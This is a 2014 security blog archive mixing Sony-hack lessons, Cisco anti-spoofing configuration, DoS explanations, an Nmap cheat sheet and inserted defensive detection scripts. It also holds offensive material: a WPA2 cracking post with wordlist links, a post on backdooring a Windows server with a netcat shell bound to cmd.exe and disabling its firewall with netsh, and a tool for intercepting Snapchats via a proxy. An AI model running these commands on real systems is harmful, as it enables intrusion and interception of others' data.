Best Cyber trend news:
https://www.riskbasedsecurity.com/2014/12/a-breakdown-and-analysis-of-the-december-2014-sony-hack/
Keep yourself up to date!
Friday, 26 December 2014
The Sony Pictures Hack: 5 short sharp lessons we all can learn!
The recent hacking of Sony Pictures offers valuable lessons in cybersecurity from which every company and consumer can learn. When you set aside the politics and gossip about nation states and Hollywood celebs, some practical implications are clear:
1. Don’t use email for sensitive communications
Why? If you need to ask you haven’t been reading the emails that hackers found on Sony Pictures’ computers and then leaked over the last few weeks. These join the countless other embarrassing and/or incriminating emails and images leaked over the years from assorted companies and government agencies. As the lawsuits against Sony Pictures mount, plaintiffs already possess evidence of the company’s lack of due care, no subpoena required. This evidence includes a critical IT auditor’s report that was reportedly shared via email as an unencrypted attachment.
Just to be clear: email is not a secure channel of communication. By default, email travels in plain text, readable to anyone snooping on the many connections and servers through which it travels. And emails that you send to someone are only as secure as that recipient and their computer. As for sharing sensitive documents as unencrypted email attachments, that should be against company policy, with severe repercussions for violators, whether they are C-level executives or hourly employees.
A good rule to live by is this: Never put anything in a digital communication that you wouldn’t want your mother (or enemies) to see. At this point in time, and for the foreseeable future, nobody can guarantee that those digital communications will never be hacked, leaked, subpoenaed, or otherwise made public. This applies to text messages, comments on web pages, messages on forums, and picture-sharing as well as email. In other words, this is really basic cyber-hygiene that has been common knowledge for decades, a fact that makes Sony Pictures’ apparent ignorance of digital realities all the more shocking.
2. Don’t give everybody access to everything
We’ve said it before and we’ll say it again: classify your documents and segment your networks. Sony Pictures could have saved itself a lot of grief if it had been enforcing a classification system that branded documents like contracts with actors and directors as Top Secret, and a policy that forbade the storing of Top Secret documents in an Internet-accessible database. Too many organizations have grown their networks with maximum convenience in mind, effectively giving everyone access to everything. Unfortunately, that means access for outsiders as well if there is even a small chink in your cyber-defenses.
Networks need to be segmented, with access controls between them to limit who can see what. Target learned this lesson the hard way last year, when hackers found it was possible to get from a supplier portal that the retailer had created, all the way to the card payment terminals in its stores. Now would be a good time to audit your networks for inappropriate connections and unfiltered access.
3. Don’t store passwords in a file called passwords
This lesson is as head-slappingly obvious as “Don’t write down your workstation password on a Post-it note and stick it to your monitor.” Yes, passwords are a pain, but there are secure methods of managing them. The failure of Sony Pictures to enforce a policy against storing passwords in plain, easy-to-read text will be one of the biggest strikes against the company in court when employees whose privacy was violated in this attack bring suits claiming negligence.
4. Don’t ignore warning signs and risks
Many “ordinary” computer users already know this: if something seems wrong, don’t ignore it. Take a screenshot, write down the error message, call support, run an antivirus scan. Sometimes it turns out to be nothing, or even a new feature you didn’t know about. Other times it means you are under attack. Various parts of the Sony empire have been under attack for years now and many attacks have succeeded. That should have told Sony executives that IT security was a priority, even before Sony Pictures decided to proceed with a movie that was 100% guaranteed to upset at least one nuclear-armed nation already suspected of carrying out cyber attacks. Consider this statement:
“I’ve lost count of how many times Sony’s online properties have been hacked now—I just don’t have that many fingers—but it’s happened again. Databases used to operate sonypictures.com, sonybmg.nl, and sonybmg.be have been compromised…using SQL injection…being susceptible to SQL injection is embarrassing enough…but what makes this hack even worse is the data that has been compromised…with one major feature in common: they included plaintext passwords.”
That was Peter Bright writing in Ars Technica in June of 2011. Three years later, in June of 2014, Sony Pictures released a teaser trailer for The Interview, a film graphically depicting the North Korean dictator’s head exploding (a sequence without which, the director Seth Rogen complained, “the joke won’t”). In other words, Sony was forewarned, but not forearmed. We see a past history of weak security combined with a failure to batten down the hatches before proceeding with a project that was bound to cause anger in at least one part of the world.
5. Don’t go another day without an incident response plan
When news of the Sony Pictures breach started to leak, the company’s response demonstrated a lack of planning. Actions taken were sometimes contradictory or inflammatory. In short, the company clearly lacked an appropriate incident response plan. Why this should be is hard to fathom. One of the most consistent themes in IT security publications over the past few years has been: It’s not if you get hacked but when. In other words, any responsible organization will put in place a plan for responding to a breach. And stick to it when a breach occurs. Here’s a link to some good incident response advice that has been freely available for several years: NIST Special Publication 800-61 Revision 2: Computer Security Incident Handling Guide (.pdf).
Summary and sympathy
Some of these lessons are stark and obvious, but they should not obscure the fact that Sony Pictures has been victimized by criminal hackers. Drawing lessons from a crime is not the same as “victim blaming”. The failure to lock the door of your car does not make you culpable if it is stolen. We should never accept that crime is inevitable. At the same time, there are many layers of victimization in a crime of this magnitude. Current and former Sony employees who have had their lives turned upside down by the breach of privacy that these criminal hackers perpetrated have every right to seek redress from an organization that could fairly be said, just on the evidence published so far, to have failed the standard of due care for protection of its employees.
For additional perspective on this evolving situation, there is a good article in Businessweek and a detailed timeline on this blog. You might also want to monitor Krebs on Security, from Brian Krebs (he’s the guy who broke the Target breach story about this time last year, some lessons from which Sony failed to learn).
Saturday, 6 December 2014
HOW TO CRACK WPA2 USING A DICTIONARY ATTACK
Here is a tutorial showing you how to hack a WPA2 Wifi password by capturing a 4 way handshake and then running a dictionary attack against the capture file.
If you require a wordlist then I have linked a few below this video:
- http://ftp.sunet.se/pub/security/too…all/wordlists/
- ftp://ftp.ox.ac.uk/pub/wordlists/
- http://gdataonline.com/downloads/GDict/
- ftp://ftp.openwall.com/pub/wordlists/
- ftp://ftp.cerias.purdue.edu/pub/dict/
- http://www.indianz.ch/tools/doc/wordlist.zip
- http://www.outpost9.com/files/WordLists.html
- ftp://ftp.openwall.com/pub/wordlists/passwords/
- English and French: https://www.securinfos.info/wordlists_dictionnaires.php
- Virtually every language: ftp://ftp.ox.ac.uk/pub/wordlists/
- http://www.lostpassword.com/f/wl/bigdict.zip
- http://www.lostpassword.com/f/wl/French.zip
- http://www.lostpassword.com/f/wl/Spanish.zip
- http://www.lostpassword.com/f/wl/German.zip
- http://www.vulnerabilityassessment.co.uk/passwords.htm
- http://packetstormsecurity.org/Crackers/wordlists/
- http://www.ai.uga.edu/ftplib/natural-language/moby/
- Cotse has possibly one of the largest collections of word lists (including French). http://www.cotse.com
- http://www.cotse.com/tools/wordlists1.htm
- http://www.cotse.com/tools/wordlists2.htm
Best of Luck guys!
HOW TO BYPASS A FIREWALL ON A WEB SERVER
The key point of this paper is to discuss how to backdoor a Windows test server and bypass its firewall.
Here are a few steps to bypass the firewall easily:
Tools:
1. Netcat
For those who don’t know how to make a netcat backdoor, read this part first. If you’re only interested in bypassing the firewall, skip it.
First I will show you how to make a backdoor using netcat:
Upload netcat to the remote PC and make it listen on a port.
For example:
C:\>nc -l -p 8080
[on 192.168.9.2]
So here we are making 8080 the listening port.
The next step is to connect to 192.168.9.2 from the remote system.
For that we need to install netcat on 192.168.9.2 and run it from the command prompt.
So here is the command we need to run on 192.168.9.2:
C:\>nc -l -p 8080 -e cmd.exe
You can use PuTTY to connect.
Just type the address 192.168.9.2 and specify port no. 8080.
Once you connect you will get the command prompt; this way you can make a backdoor connection on the Windows server.
After getting the command prompt you can disable the firewall, if required, from the command line:
C:\>netsh firewall set opmode disable
Or use:
C:\Windows\System32\netsh.exe "firewall set opmode = DISABLE profile = ALL"
When it comes to a real scenario, most web servers block RDP connections, in the sense that they block inbound traffic on port no. 3389:
[IIS Webserver]————-[=Firewall=]————-attacker
So the firewall rules will be:
Allow traffic on 80, 443. Deny all (exception on 80 and 443).
So when we try to make an RDP connection from the external network it fails. There are a few methods by which we can trick the firewall, by running netcat on 443 or any other open port on the server. We just need to run netcat on 443 because the firewall allows 443 traffic.
OR YOU CAN USE RDP
The tools specified above can be freely downloaded online. You can contact me on egbe201@yahoo.com for further information. Best of Luck!
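From the defender's side, the commands shown in this post are exactly what process-creation logging should flag: a firewall being switched off from the command line, and netcat bound to a shell. The following Python script is an added example, not part of the original post. It runs a few ordered rules over constructed process-creation records (a hypothetical key=value format modelled on the fields of Windows Security event 4688; the host, user, paths and timestamps are made up) and reports the matches.

```python
import re

# Constructed sample process-creation records (hypothetical key=value format
# modelled on Windows Security event 4688 fields; hosts, users and paths are made up).
SAMPLE_EVENTS = [
    'ts=2014-12-06T10:01:12Z host=WEB01 user=svc_iis image=C:\\Windows\\System32\\cmd.exe cmdline="cmd.exe /c dir"',
    'ts=2014-12-06T10:02:40Z host=WEB01 user=svc_iis image=C:\\inetpub\\temp\\nc.exe cmdline="nc -l -p 8080 -e cmd.exe"',
    'ts=2014-12-06T10:03:05Z host=WEB01 user=svc_iis image=C:\\Windows\\System32\\netsh.exe cmdline="netsh firewall set opmode disable"',
    'ts=2014-12-06T10:04:00Z host=WEB01 user=admin image=C:\\Windows\\System32\\netsh.exe cmdline="netsh firewall show state"',
    'ts=2014-12-06T10:05:31Z host=WEB01 user=svc_iis image=C:\\Windows\\System32\\netsh.exe cmdline="netsh.exe firewall set opmode = DISABLE profile = ALL"',
    'ts=2014-12-06T10:06:10Z host=WEB01 user=svc_iis image=C:\\Windows\\System32\\netsh.exe cmdline="netsh advfirewall set allprofiles state off"',
]

EVENT_RE = re.compile(
    r'ts=(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) '
    r'image=(?P<image>\S+) cmdline="(?P<cmdline>[^"]*)"'
)

# Ordered rules: the first match wins. The patterns cover both the legacy
# "netsh firewall" syntax used in the post and the newer "netsh advfirewall" syntax.
RULES = [
    ("firewall_disabled", re.compile(
        r"\bnetsh(\.exe)?\s+firewall\s+set\s+opmode\s*=?\s*disable\b", re.I)),
    ("firewall_disabled", re.compile(
        r"\bnetsh(\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off\b", re.I)),
    ("netcat_shell", re.compile(
        r"\b(nc|ncat|netcat)(\.exe)?\b.*\s-e\s+\S*(cmd|powershell)", re.I)),
    ("netcat_listener", re.compile(
        r"\b(nc|ncat|netcat)(\.exe)?\b.*\s-l\b", re.I)),
]


def classify(cmdline):
    """Return the name of the first rule the command line matches, or None."""
    for name, pattern in RULES:
        if pattern.search(cmdline):
            return name
    return None


def triage(events):
    """Parse each record and return (rule, user, cmdline) for every suspicious one."""
    hits = []
    for raw in events:
        m = EVENT_RE.search(raw)
        if not m:
            continue  # unparseable record: skip it rather than silently pass it
        rule = classify(m.group("cmdline"))
        if rule:
            hits.append((rule, m.group("user"), m.group("cmdline")))
    return hits


if __name__ == "__main__":
    for rule, user, cmdline in triage(SAMPLE_EVENTS):
        print(f"{rule:18} user={user:8} {cmdline}")
```

The point of the ordering is that a netcat command line carrying `-e` is more interesting than a plain listener, and a firewall-disable command is interesting regardless of who ran it; in practice the `user` field (here a web-service account running netsh) is what turns a match into an alert.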
Wednesday, 3 December 2014
DOWNLOAD FREE WIFI HACKING AND DEFENCE (PDF PRESENTATION) - This is only for educational purposes!
Here is a free WiFi hacking PDF that will teach you all about how the 802.11 protocol works, as well as how to hack WEP, WPA, WPA2 and WPS and how to protect against it.
1 – The following discussion is for informational and educational purposes only.
2 – Hacking into a private network without written permission from the owner is illegal and strictly forbidden.
3 – Misuse could result in breaking the law, so use it at your own risk.
Sunday, 16 November 2014
Network Scanning a Vulnerable Test Server Using Nmap
Watch this Video: http://www.youtube.com/watch?v=0UwW27FuS5s
Friday, 14 November 2014
Types of Denial of Service Attack 1
Smurf Attack:
This form of attack involves sending Internet Control Message Protocol (ICMP) echo (ping) requests to multiple Internet Protocol (IP) broadcast addresses. All of these messages have a spoofed source address of the intended victim. Each host receiving the ICMP echo request replies with an echo reply to the source address, which in this case is the target of the attack. The weight of this attack is therefore effectively multiplied by the number of responding hosts. If the attack took place on a multi-broadcast network there could potentially be hundreds of machines replying to each packet sent.
UDP Flood:
A UDP flood, also known as a fraggle, is a cousin of the Smurf attack. It is based on the UDP echo and character generator (chargen) services. It uses a forged UDP packet to connect the echo service on one machine to the chargen service on another. These two machines then use up all available bandwidth, sending characters back and forth between themselves.
SYN Flood:
A SYN flood exploits the standard TCP 3-way handshake. The attacker sends a connection request (SYN) to the server and then ignores the server's SYN-ACK, never sending the final acknowledgement (ACK). This forces the server to hold the half-open connection while waiting for the ACK that never arrives, wasting time and resources. A server can at any given time only hold a fixed number of pending connections, and so this form of attack can effectively block all legitimate traffic.
The following are examples of distributed denial of service attacks and the way in which the zombie machines in each case are controlled. There are numerous variations of this kind of attack in existence.
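The three attacks above leave recognisable traces on the victim side, and that is what a defender monitors for. The following Python script is an added example, not part of the original post: it counts half-open (SYN_RECV) connections per remote address in a constructed netstat-style connection table to flag a SYN flood, and checks constructed ICMP echo-request records for destinations that are directed-broadcast addresses of local subnets, the amplification vector a Smurf attack relies on. The subnets, addresses and the threshold are assumptions.

```python
import ipaddress
from collections import Counter

# Constructed netstat-style connection table of a web server under attack (not real data):
# proto  recv-q  send-q  local         remote               state
NETSTAT_SAMPLE = """\
tcp  0  0  10.0.0.5:80  198.51.100.7:40001  SYN_RECV
tcp  0  0  10.0.0.5:80  198.51.100.7:40002  SYN_RECV
tcp  0  0  10.0.0.5:80  198.51.100.7:40003  SYN_RECV
tcp  0  0  10.0.0.5:80  198.51.100.7:40004  SYN_RECV
tcp  0  0  10.0.0.5:80  198.51.100.7:40005  SYN_RECV
tcp  0  0  10.0.0.5:80  198.51.100.7:40006  SYN_RECV
tcp  0  0  10.0.0.5:80  203.0.113.4:51000   ESTABLISHED
tcp  0  0  10.0.0.5:80  203.0.113.9:53122   SYN_RECV
tcp  0  0  10.0.0.5:22  203.0.113.9:53123   ESTABLISHED
"""


def half_open_by_source(netstat_text):
    """Count connections stuck in SYN_RECV (server sent SYN-ACK, never got the ACK) per remote address."""
    counts = Counter()
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] not in ("tcp", "tcp6"):
            continue
        if parts[5] == "SYN_RECV":
            remote_ip = parts[4].rsplit(":", 1)[0]  # strip the port
            counts[remote_ip] += 1
    return counts


def syn_flood_suspects(netstat_text, threshold=5):
    """Remote addresses holding at least `threshold` half-open connections (threshold is an assumption)."""
    return sorted(ip for ip, n in half_open_by_source(netstat_text).items() if n >= threshold)


# Constructed list of subnets we own; Smurf traffic aims at their directed-broadcast addresses.
OUR_SUBNETS = [ipaddress.ip_network("10.0.0.0/24"), ipaddress.ip_network("10.0.1.0/24")]


def is_directed_broadcast(dst_ip, subnets=OUR_SUBNETS):
    addr = ipaddress.ip_address(dst_ip)
    return any(addr == net.broadcast_address for net in subnets)


# Constructed ICMP echo-request summaries as (source, destination); in a Smurf
# attack the source is the spoofed victim, so the source alone tells you nothing.
ICMP_SAMPLE = [
    ("192.0.2.10", "10.0.0.255"),
    ("10.0.0.12", "10.0.0.1"),
    ("192.0.2.10", "10.0.1.255"),
    ("192.0.2.10", "10.0.0.9"),
]


def smurf_amplification_requests(echo_requests, subnets=OUR_SUBNETS):
    """Echo requests addressed to one of our broadcast addresses: each would be answered by every host on that subnet."""
    return [(src, dst) for src, dst in echo_requests if is_directed_broadcast(dst, subnets)]


if __name__ == "__main__":
    print("SYN flood suspects:", syn_flood_suspects(NETSTAT_SAMPLE))
    print("Smurf amplification requests:", smurf_amplification_requests(ICMP_SAMPLE))
```

A real SYN flood usually comes from many spoofed sources rather than one, so the per-source count is a first cut; the total SYN_RECV count against the listen backlog is the better health signal, and SYN cookies remove the resource exhaustion altogether. For Smurf, the fix is on the router rather than the host: refusing to forward directed broadcasts (`no ip directed-broadcast` on Cisco IOS, the default on modern releases) means the echo requests never reach the subnet.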
We will post the next lesson shortly!
Prevent IP spoofing with the Cisco IOS
In a typical IP address spoofing attempt, the attacker fakes the source of packets in order to appear as part of an internal network. David Davis tells you three ways you can make an attacker's life more difficult—and prevent IP address spoofing.
As you know, the Internet is rife with security threats, and one such threat is IP address spoofing. During a typical IP address spoofing attempt, the attacker simply fakes the source of packets in order to appear as part of an internal network. Let's discuss three ways you can protect your organization from this type of attack.
Block IP addresses
The first step in preventing spoofing is blocking IP addresses that pose a risk. While there can be a reason that an attacker might spoof any IP address, the most commonly spoofed IP addresses are private IP addresses (RFC 1918) and other types of shared/special IP addresses.
Here's a list of IP addresses—and their subnet masks—that I would block from coming into my network from the Internet:
- 10.0.0.0/8
- 172.16.0.0/12
- 192.168.0.0/16
- 127.0.0.0/8
- 224.0.0.0/3
- 169.254.0.0/16
All of the above are either private IP addresses that aren't routable on the Internet or used for other purposes and shouldn't be on the Internet at all. If traffic comes in with one of these IP addresses from the Internet, it must be fraudulent traffic.
In addition, other commonly spoofed IP addresses are whatever internal IP addresses your organization uses. If you're using all private IP addresses, your range should already fall into those listed above. However, if you're using your own range of public IP addresses, you need to add them to the list.
Implement ACLs
The easiest way to prevent spoofing is using an ingress filter on all Internet traffic. The filter drops any traffic with a source falling into the range of one of the IP networks listed above. In other words, create an access control list (ACL) to drop all inbound traffic with a source IP in the ranges above.
Here's a configuration example:
Router# conf t
Enter configuration commands, one per line. End with CNTL/Z.
Router(config)# ip access-list ext ingress-antispoof
Router(config-ext-nacl)# deny ip 10.0.0.0 0.255.255.255 any
Router(config-ext-nacl)# deny ip 172.16.0.0 0.15.255.255 any
Router(config-ext-nacl)# deny ip 192.168.0.0 0.0.255.255 any
Router(config-ext-nacl)# deny ip 127.0.0.0 0.255.255.255 any
Router(config-ext-nacl)# deny ip 224.0.0.0 31.255.255.255 any
Router(config-ext-nacl)# deny ip 169.254.0.0 0.0.255.255 any
Router(config-ext-nacl)# permit ip any any
Router(config-ext-nacl)# exit
Router(config)# int s0/0
Router(config-if)# ip access-group ingress-antispoof in
Internet service providers (ISPs) must use filtering like this on their networks, as defined in RFC 2267. Notice how this ACL includes permit ip any any at the end. In the "real world," you would probably have a stateful firewall inside this router that protects your internal LAN.
Of course, you could take this to the extreme and filter all inbound traffic from other subnets in your internal network to make sure that someone isn't on one subnet and spoofing traffic to another network. You could also implement egress ACLs to prevent users on your network from spoofing IP addresses from other networks. Keep in mind that this should be just one part of your overall network security strategy.
Use reverse path forwarding (ip verify)
Another way to protect your network from IP address spoofing is reverse path forwarding (RPF)—or ip verify. In the Cisco IOS, the commands for reverse path forwarding begin with ip verify.
RPF works much like part of an anti-spam solution. That part receives inbound e-mail messages, takes the source e-mail address, and performs a recipient lookup on the sending server to determine if the sender really exists on the server the message came from. If the sender doesn't exist, the server drops the e-mail message because there's no way to reply to the message—and it's very likely spam.
RPF does something similar with packets. It takes the source IP address of a packet received from the Internet and looks up to see if the router has a route in its routing table to reply to that packet. If there's no route in the routing table for a response to return to the source IP, then someone likely spoofed the packet, and the router drops the packet.
Here's how to configure RPF on your router:
Router(config)# ip cef
Router(config)# int serial0/0
Router(config-if)# ip verify unicast reverse-path
Note that this won't work on a multi-homed network.
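As an added example (not from the article and not Cisco code), the Python below models the two mechanisms the article configures. It derives the wildcard masks for the ingress ACL from the CIDR list above (a Cisco wildcard mask is the bitwise inverse of the netmask, which is what `ipaddress`'s `hostmask` gives), renders the ACL, and then models strict reverse-path forwarding against a constructed routing table, including the multi-homed case the note above warns about: a legitimate source whose return route leaves by a different interface than the one the packet arrived on. The interface names and the routing table are assumptions.

```python
import ipaddress

# The ranges the article blocks at the Internet edge.
BLOCKED_SOURCES = ["10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                   "127.0.0.0/8", "224.0.0.0/3", "169.254.0.0/16"]


def wildcard_mask(cidr):
    """Cisco ACL wildcard mask: the bitwise inverse of the netmask (0 = must match, 1 = don't care)."""
    return str(ipaddress.ip_network(cidr).hostmask)


def render_ingress_acl(name, cidrs, interface):
    """Produce the IOS configuration lines for an ingress anti-spoofing ACL."""
    lines = [f"ip access-list extended {name}"]
    for cidr in cidrs:
        net = ipaddress.ip_network(cidr)
        lines.append(f" deny ip {net.network_address} {net.hostmask} any")
    lines.append(" permit ip any any")
    lines += ["exit", f"interface {interface}", f" ip access-group {name} in"]
    return lines


def ingress_permits(src_ip, cidrs=BLOCKED_SOURCES):
    """True if a packet with this source would pass the ACL above (first matching entry wins)."""
    addr = ipaddress.ip_address(src_ip)
    return not any(addr in ipaddress.ip_network(c) for c in cidrs)


# Constructed routing table (prefix -> egress interface); interface names are assumptions.
ROUTES = {
    "0.0.0.0/0": "serial0/0",      # default route towards the ISP
    "10.1.0.0/16": "gi0/1",        # internal LAN
    "198.51.100.0/24": "gi0/2",    # a peer reachable only via a second uplink
}


def best_route(src_ip, routes=ROUTES):
    """Longest-prefix match; returns (prefix, interface) or None."""
    addr = ipaddress.ip_address(src_ip)
    matches = [(ipaddress.ip_network(p), iface) for p, iface in routes.items()
               if addr in ipaddress.ip_network(p)]
    if not matches:
        return None
    net, iface = max(matches, key=lambda m: m[0].prefixlen)
    return str(net), iface


def strict_urpf_accepts(src_ip, ingress_if, routes=ROUTES, allow_default=False):
    """Strict RPF: accept only if the best route back to the source leaves via the ingress interface.
    The default route does not count unless allow_default is set (modelled on IOS behaviour)."""
    route = best_route(src_ip, routes)
    if route is None:
        return False
    prefix, iface = route
    if prefix == "0.0.0.0/0" and not allow_default:
        return False
    return iface == ingress_if


if __name__ == "__main__":
    print("\n".join(render_ingress_acl("ingress-antispoof", BLOCKED_SOURCES, "serial0/0")))
    for src, iface in [("10.1.2.3", "serial0/0"), ("10.1.2.3", "gi0/1"), ("198.51.100.9", "serial0/0")]:
        print(f"{src:14} on {iface:9} ACL={ingress_permits(src)} uRPF={strict_urpf_accepts(src, iface)}")
```

Two things the model makes visible: a packet claiming an internal 10.1.x.x source that arrives on the Internet interface fails both checks, while a genuine peer at 198.51.100.9 arriving on `serial0/0` passes the ACL but is dropped by strict RPF because the route back to it points at `gi0/2`, which is the multi-homing problem the note above refers to. On IOS the default route is only used for verification when the newer `ip verify unicast source reachable-via rx allow-default` form is configured; the `allow_default` flag models that.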
It's important to protect your private network from attackers on the Internet. These three methods can go a long way toward protecting against IP address spoofing. For more information on IP address spoofing, read "IP Address Spoofing: An Introduction."
IT SECURITY POLICY TEMPLATES:
http://www.comptechdoc.org/independent/security/policies/antivirus-policy.html
See realtime Cyber attacks with DDoS Attack Map
One of the major threats to websites and data centers is DDoS attacks: Distributed Denial of Service. If you’ve ever wondered how many attacks go on per day, now you can see DDoS attacks happen in real time.
DDoS attacks
DDoS attacks are a calculated effort to hit an online service where it matters: uptime. Bringing down a service is achieved by spamming it heavily with traffic from different places, by tapping into various computers and requesting them to access the target. The DDoS attack map shows all the current attacks happening in real time all over the world. Going around the map, you can see where the attack is coming from, who the target is and the severity of the attack based on a variety of factors.
It’s an amazing visual to see all the attacks going on at one time, sort of like a colorful rainbow of terror. You can also use the cursor at the bottom to drag to a different date, allowing you to see heavier and lighter days and how that translates to the map. Protecting yourself from a DDoS attack is crucial for online services: going down due to an attack can be bad not only for your data but also for your business’ visibility and brand. Taking the necessary steps to be proactive about DDoS attacks can go a long way in saving you some stress and frustration.
Setting up a firewall that alerts you to potential intrusions, along with network monitoring and managed services, can be a great deterrent and prevent some cyber threats.
Overall, this is a great tool if you ever wanted to see what’s going on in the world of cyber security on any given day.
Monday, 10 November 2014
AirHopper: Using FM Radio Signals to Hack Into Isolated Computers
In order to secure sensitive information such as financial data, many companies and government agencies rely on totally isolated computer systems, making sure they aren't connected to any network at all. But the most secure systems aren't safe anymore.
Security researchers at the Cyber Security Labs at Ben Gurion University in Israel have found a way to snoop on a personal computer even with no network connection.
STEALING DATA USING RADIO SIGNALS
Researchers have developed a proof-of-concept malware that can infiltrate a closed network to lift data from a machine that has been kept completely isolated from the internet or any Wi-Fi connection by using little more than a mobile phone’s FM radio signals.
Researcher Mordechai Guri, along with Professor Yuval Elovici of Ben Gurion University, presented the research on Thursday at the 9th IEEE International Conference on Malicious and Unwanted Software (MALCON 2014), held in Denver.
This new technology is known as ‘AirHopper’ — basically a keylogger app to track what is being typed on the computer or the mobile phone.
AirHopper is a special type of keylogger because it uses radio frequencies to transmit data from a computer, all by exploiting the computer's monitor display, in order to evade air-gap security measures.
"This is the first time that a mobile phone is considered in an attack model as the intended receiver of maliciously crafted radio signals emitted from the screen of the isolated computer," according to a release by Ben Gurion University.
HOW DOES AIRHOPPER WORK ?
The technology works by using the FM radio receiver included in some mobile phones. AirHopper is able to capture keystrokes by intercepting certain radio emissions from the monitor or display unit of the isolated computer.
The researchers can then pick up the FM signals on a nearby smartphone and translate the FM signals into the typed text.
LIMITATIONS
The technique is completely new, although it has some limitations. The team claims that textual and binary information can be gathered from a distance of up to 7 meters with an effective FM-bandwidth of 13-60 bps (bytes per second).
"AirHopper demonstrates how textual and binary data can be exfiltrated from physically a (sic) isolated computer to mobile phones at a distance of 1-7 meters, with effective bandwidth of 13-60 (bytes per second). Enough to steal a secret password."
This, according to the researchers, is enough to steal a secret password. Therefore, in an effort to obtain secret data, an attacker could infect the mobile phone of a staff member with AirHopper running in stealth mode, and then transmit the data.
VIDEO DEMONSTRATION AND POTENTIAL DANGER
The researchers have also provided a proof-of-concept video, so you can watch the demonstration and decide whether you should be worried.
Video link: http://www.youtube.com/watch?v=2OzTWiGl1rM
According to the researchers, the AirHopper technique of data theft was developed by the University in order to protect against potential intrusions of this kind in the future.
"Such technique can be used potentially by people and organizations with malicious intentions and we want to start a discussion on how to mitigate this newly presented risk." said Dudu Mimran, chief technology officer of the Ben Gurion University’s cyber security labs.
Saturday, 8 November 2014
Snapception: Intercept and Decrypt All Snapchats Received Over Your Network
Snapception: Intercept and decrypt all Snapchats received over your network.
Installing is easy:
pip install snapception
Starting it is easy too:
snapception --help
Usage: snapception [OPTIONS]
Options:
-v, --verbose Enable logging
-vv, --very-verbose Include mitmdump in logging
-o, --output TEXT Specify output directory (Default is ~/snaps)
--help Show this message and exit.
Configuring:
Configure your device to use a proxy pointing to Port 8080 of the host computer
Install a CA on your device by visiting mitm.it once connected to the proxy
Watch all the Snapchats you receive over the network become available on your computer.
Snapception intercepts all snapchats received over the network, so long as the receiving device is connected to the computer running Snapception via a proxy. Those applications also require you to manually log in and save your snapchat before officially opening it; Snapception automatically intercepts, decrypts, and saves your received snaps.
Download
NMAP (Network Mapping) Cheat Sheet
Nmap (Network Mapping) Cheat Sheet. Nmap is a very famous port scanner, available for free. It is not just a port scanner; it also does various jobs like banner grabbing, OS fingerprinting, Nmap script scanning, evading firewalls, etc. So we are going to show you some important Nmap commands.
Step 1: Open up the console and type nmap
It will print the full list of Nmap's options. But we are here to understand the commands, so let's go ahead.
Here is the cheatsheet of NMAP.
BASIC SCANNING TECHNIQUES
| Goal | Command | Example |
|---|---|---|
| Scan a Single Target | nmap [target] | nmap 192.168.0.1 |
| Scan Multiple Targets | nmap [target1, target2, etc] | nmap 192.168.0.1 192.168.0.2 |
| Scan a List of Targets | nmap -iL [list.txt] | nmap -iL targets.txt |
| Scan a Range of Hosts | nmap [range of ip addresses] | nmap 192.168.0.1-10 |
| Scan an Entire Subnet | nmap [ip address/cidr] | nmap 192.168.0.1/24 |
| Scan Random Hosts | nmap -iR [number] | nmap -iR 0 |
| Excluding Targets from a Scan | nmap [targets] --exclude [targets] | nmap 192.168.0.1/24 --exclude 192.168.0.100, 192.168.0.200 |
| Excluding Targets Using a List | nmap [targets] --excludefile [list.txt] | nmap 192.168.0.1/24 --excludefile notargets.txt |
| Perform an Aggressive Scan | nmap -A [target] | nmap -A 192.168.0.1 |
| Scan an IPv6 Target | nmap -6 [target] | nmap -6 1aff:3c21:47b1:0000:0000:0000:0000:2afe |
DISCOVERY OPTIONS
| Goal | Command | Example |
|---|---|---|
| Perform a Ping Only Scan | nmap -sP [target] | nmap -sP 192.168.0.1 |
| Don’t Ping | nmap -PN [target] | nmap -PN 192.168.0.1 |
| TCP SYN Ping | nmap -PS [target] | nmap -PS 192.168.0.1 |
| TCP ACK Ping | nmap -PA [target] | nmap -PA 192.168.0.1 |
| UDP Ping | nmap -PU [target] | nmap -PU 192.168.0.1 |
| SCTP INIT Ping | nmap -PY [target] | nmap -PY 192.168.0.1 |
| ICMP Echo Ping | nmap -PE [target] | nmap -PE 192.168.0.1 |
| ICMP Timestamp Ping | nmap -PP [target] | nmap -PP 192.168.0.1 |
| ICMP Address Mask Ping | nmap -PM [target] | nmap -PM 192.168.0.1 |
| IP Protocol Ping | nmap -PO [target] | nmap -PO 192.168.0.1 |
| ARP Ping | nmap -PR [target] | nmap -PR 192.168.0.1 |
| Traceroute | nmap --traceroute [target] | nmap --traceroute 192.168.0.1 |
| Force Reverse DNS Resolution | nmap -R [target] | nmap -R 192.168.0.1 |
| Disable Reverse DNS Resolution | nmap -n [target] | nmap -n 192.168.0.1 |
| Alternative DNS Lookup | nmap --system-dns [target] | nmap --system-dns 192.168.0.1 |
| Manually Specify DNS Server(s) | nmap --dns-servers [servers] [target] | nmap --dns-servers 201.56.212.54 192.168.0.1 |
| Create a Host List | nmap -sL [targets] | nmap -sL 192.168.0.1/24 |
ADVANCED SCANNING OPTIONS
| Goal | Command | Example |
|---|---|---|
| TCP SYN Scan | nmap -sS [target] | nmap -sS 192.168.0.1 |
| TCP Connect Scan | nmap -sT [target] | nmap -sT 192.168.0.1 |
| UDP Scan | nmap -sU [target] | nmap -sU 192.168.0.1 |
| TCP NULL Scan | nmap -sN [target] | nmap -sN 192.168.0.1 |
| TCP FIN Scan | nmap -sF [target] | nmap -sF 192.168.0.1 |
| Xmas Scan | nmap -sX [target] | nmap -sX 192.168.0.1 |
| TCP ACK Scan | nmap -sA [target] | nmap -sA 192.168.0.1 |
| Custom TCP Scan | nmap --scanflags [flags] [target] | nmap --scanflags SYNFIN 192.168.0.1 |
| IP Protocol Scan | nmap -sO [target] | nmap -sO 192.168.0.1 |
| Send Raw Ethernet Packets | nmap --send-eth [target] | nmap --send-eth 192.168.0.1 |
| Send IP Packets | nmap --send-ip [target] | nmap --send-ip 192.168.0.1 |
PORT SCANNING OPTIONS
| Goal | Command | Example |
|---|---|---|
| Perform a Fast Scan | nmap -F [target] | nmap -F 192.168.0.1 |
| Scan Specific Ports | nmap -p [port(s)] [target] | nmap -p 21-25,80,139,8080 192.168.1.1 |
| Scan Ports by Name | nmap -p [port name(s)] [target] | nmap -p ftp,http* 192.168.0.1 |
